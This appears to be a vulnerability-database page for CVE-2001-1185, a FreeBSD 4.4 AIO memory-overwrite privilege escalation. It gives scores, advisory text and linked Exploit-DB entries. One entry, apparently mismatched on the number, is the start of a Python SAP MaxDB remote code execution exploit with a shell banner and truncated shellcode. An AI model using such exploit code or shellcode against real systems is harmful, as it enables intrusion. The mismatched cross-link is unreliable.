CVE-2001-1185
published 2001-12-10CVE-2001-1185: Some AIO operations in FreeBSD 4.4 may be delayed until after a call to execve, which could allow a local user to overwrite memory of the new process and gain…
PriorityP416medium6.2CVSS 2.0
AVLACHAuNCCICAC
EXPLOIT
EPSS
0.81%
52.3th percentile
Some AIO operations in FreeBSD 4.4 may be delayed until after a call to execve, which could allow a local user to overwrite memory of the new process and gain privileges.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SAP MaxDB - Malformed Handshake Request Remote Code Execution
exploitdb·2010-03-26
CVE-2010-1185 SAP MaxDB - Malformed Handshake Request Remote Code Execution
SAP MaxDB - Malformed Handshake Request Remote Code Execution
---
#!/usr/bin/python
# Exploit title: SAP MaxDB Malformed Handshake Request Remote Code Execution
# Date: 2010.03.26
# Author: S2 Crew [Hungary]
# Software link: sap.com
# Version: 7.7.06.09
# Tested on: Windows XP SP2 EN
# CVE: ZDI-10-032
# Code:
#############################################################
# Trying 172.16.29.133...
# Connected to 172.16.29.133.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\sdb\data\wrk>
#############################################################
import socket
import sys
import os
sc = (
"\x31\xc9\xda\xda\xbe\x94\x3f\xbe\xea\xb1\x56\xd9\x74\x24\xf4"
"\x5f\x31\x77\x17\x03\x77\x17\x83\xef\xfc\x76\xca\x42\x02\xff"
"\x
Exploit-DB
FreeBSD 4.4 - AIO Library Cross Process Memory Write
exploitdb·2001-12-10
CVE-2001-1185 FreeBSD 4.4 - AIO Library Cross Process Memory Write
FreeBSD 4.4 - AIO Library Cross Process Memory Write
---
// source: https://www.securityfocus.com/bid/3661/info
aio.h is a library implementing the POSIX standard for asynchronous I/O. Support for AIO may be enabled in FreeBSD by compiling the kernel with the VFS_AIO option. This option is not enabled in the default kernel configuration.
Under some circumstances, pending reads from an input socket may persist through a call to execve. Eventually the read will continue, and write to the memory space of the new process.
If a local user is able to create and execute a malicious program calling a suid program, it may be possible to overwrite arbitrary memory locations in the suid process with arbitrary data. This could immediately lead to escalated privileges.
/* tao - FreeBSD Local AIO
No writeups or analysis indexed.
http://www.iss.net/security_center/static/7693.phphttp://www.osvdb.org/2001http://www.securityfocus.com/archive/1/244583http://www.securityfocus.com/bid/3661http://www.iss.net/security_center/static/7693.phphttp://www.osvdb.org/2001http://www.securityfocus.com/archive/1/244583http://www.securityfocus.com/bid/3661
2001-12-10
Published